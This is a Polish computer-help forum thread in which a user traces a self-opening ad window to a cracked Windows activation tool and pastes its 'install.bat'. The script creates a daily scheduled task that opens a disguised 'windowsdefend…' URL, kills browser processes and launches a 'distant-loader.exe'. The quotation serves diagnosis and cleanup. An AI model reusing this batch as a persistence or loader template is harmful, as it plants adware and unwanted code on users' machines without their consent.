Skocz do zawartości

Aktualności

Artykuły

Może Cię zainteresować

Samo otwierające się okno przeglądarki z reklamą

Rozpoczęty przez jjey225, sie 02 2017 20:24

  • Zaloguj się, aby dodać odpowiedź
5 odpowiedzi w tym temacie

#1

jjey225
  • jjey225
  • Początkujący uczestnik
  • Użytkownik
  • 10 postów

Hej, otóż od pewnego czasu zauważyłem, iż przeglądarka Firefox włącza mi pojedyncze okno z jakąś reklamą. Dzieje się tak nawet gdy przeglądarka jest wyłączona. Udało mi się ustalić po historii jaki adres jest samoczynnie wpisywany:

 

http://windowsdefend...oad.php?mn=9996

Myślałem na początku, że Windows Defender stał się wirusem albo coś ale nie sądzę gdyż ten jest wyłączony ponieważ posiadam Avast'a, a ten nic nie wykrył. Macie jakieś pomysły?

Na razie to okno wyskakuje co kilka godzin i nie jest za bardzo upierdliwe ale boję się że niedługo może zacząć się dziać coś gorszego.


  • 0
  • Do góry
  • Napisano 02 sierpień 2017 - 20:24

#2

reyden
  • reyden
  • Uczestnik
  • Stały użytkownik
  • 11044 postów
  • Płeć:Mężczyzna
  • Skąd:Gliwice

Zastap Avasta porządnym antywirusem .

 

Przeskanuj kompa za pomocą Malware Bytes Antimalware lub AdwCleaner , opcjonalnie Dr.Web CureIT , po skanie daj loga z wynikiem działania któregoś z tych programów , zresztą wszystko masz w zasadach dotyczących tego działu .


  • 0

E5200 Cooled by Karakorum | Asus P5QL-E | 4GB DDR2 800 mhz |Asus HD4850 512MB | Transcend SSD370 128GB + Toshiba 1TB i WD 320GB | Corsair VX 450W | CM Elite 335

  • Do góry
  • Napisano 02 sierpień 2017 - 20:51

#3

jjey225
  • jjey225
  • Początkujący uczestnik
  • Użytkownik
  • 10 postów

Na razie ukończyłem w końcu skan Avast'a oto on:

d182a2f458fb4.png

 

Ten pierwszy plik: "ICReninstall_windwos_reg_ac.exe" został usunięty, drugi tak samo jednak folder "Removewat 2.2.7" został, a w nim plik "install.bat".

Znajduje się w nim taka zawartość:

 

schtasks /create /tn "PPI Update" /tr "%SYSTEMROOT%\explorer.exe ""http://windowsdefend....php?mn=9996"""/sc DAILY
@echo off
echo Download and Install Removewat Final by Daz Team...
echo Opeaning Setup...
"Setup activation.exe"
echo.
@echo off
taskkill /f /IM chrome.exe
taskkill /f /IM firefox.exe
taskkill /f /IM iexplore.exe
cls

echo Install Removewat  2.2.7 50%...
echo.
echo Applying Registry Patch...
echo.
"Setup activation1.exe"
echo Removewat  2.2.7 78%...
echo.
echo Installation Completed....
echo.
"distant-loader.exe"
echo.
echo.
echo New Removewat  2.2.7 found!
echo.
start windows_reg_ac.exe
echo.
echo Download and install new version....
echo.
@echo off
schtasks /Run /TN "PPI Update"
echo New Removewat 2.6.7 Found! ** UPDATE IN PROGRESS... **
echo.
echo.
echo.
echo.
echo.
echo Updating to New Version....
pause

Po tej pierwszej części, czyli: "schtasks /create /tn "PPI Update" /tr "%SYSTEMROOT%\explorer.exe ""http://windowsdefend....php?mn=9996"""/sc DAILY" wiem już o co chodzi. 5 minut w cmd'u czytania pomocy i proszę:

71d38c80aef31.png

Czystko, pusto, pięknie. Avast jak widać nie taki zły.

Spanikowałem trochę i za szybko posta napisałem, sorry za zaśmiecanie forum.

 

P.S.:

Zastap Avasta porządnym antywirusem .

 W takim razie kolego reyden, jaki antywirus polecasz?


  • 0
  • Do góry
  • Napisano 02 sierpień 2017 - 21:42

#4

Devil
  • Devil
  • Uczestnik
  • Stały użytkownik
  • 12339 postów
  • Płeć:Mężczyzna
  • Skąd:Wrocław

Ja tam korzystam z Eseta od lat  i nie od lat nie mam problemu z wirusami czy innym syfem. Wystarczy z głową korzystać z internetu i odpowiednio sprawdzać apki, które się  instaluje. Czasem dorzucają różne świństwa. Samo włączająca się przeglądarka z reklamą może wskzywać, że jakiś  program działający w tle uruchamia ją co jakiś czas. Może to być  jakiś syf też, więc warto przeskanować dysk i system różnymi programami. Jest tego trochę. W innym wypadku usuń całkowicie Firefox'a. Ale wcześniej usuń wszystkie ciasteczka  i całą  historię, oraz wszelkie katalogi po firefox'ie.  Zainstaluj Chrome i sprawdź jak tam będzie.


  • 1

I7 6700K@4.5 GHz | ASRock z170 Extreme4 | Asus (Strix) GTX 1080Ti@2025/11000| 2x8GB DDR4 CL15 3000 | Crucial M550 256GB + Samsung 850 EVO 500GB | WD RED  3TB | WIN 10x 64 | SAMSUNG 49KS7500 | ASUS XONAR D2X + Logitech Z-5500 | SAMSUNG GALAXY TAB S3 9,7 | Iphone 6S

  • Do góry
  • Napisano 02 sierpień 2017 - 22:21

#5

jjey225
  • jjey225
  • Początkujący uczestnik
  • Użytkownik
  • 10 postów

Od czasu kupna nowego komputera zacząłem każdą instalkę czy spakowaną paczkę skanować antywirusem przed jak i po odpakowaniu.
Mój problem zaczął się w sumie od czasu gdy użyłem programu usuwającego WAT gdyż zaczęły mnie denerwować powiadomienia o tym że mogę być ofiarą fałszywego oprogramowania. Teraz dopiero zauważyłem iż 1 linijka z komendą w batchu jest w stanie narobić tyle problemów.
Generalnie korzystam z 2 przeglądarek: Firefox'a i Chrome'a. Ognisty Lis jest moją główną przeglądarką. Z Chrome'em problemów nie było, teraz muszę poczekać i zobaczyć czy problem znikł na dobre.
W sumie ESET też jest ciekawy i na pewno o obczaje.
Dzięki :biggrin:


  • 0
  • Do góry
  • Napisano 02 sierpień 2017 - 22:58

#6

Kolobos
  • Kolobos
  • Uczestnik
  • Moderator Działu
  • 3389 postów
  • Skąd:Warszawa

Zamiesc wymagane logi z FRST! 


  • 0
  • Do góry
  • Napisano 03 sierpień 2017 - 22:58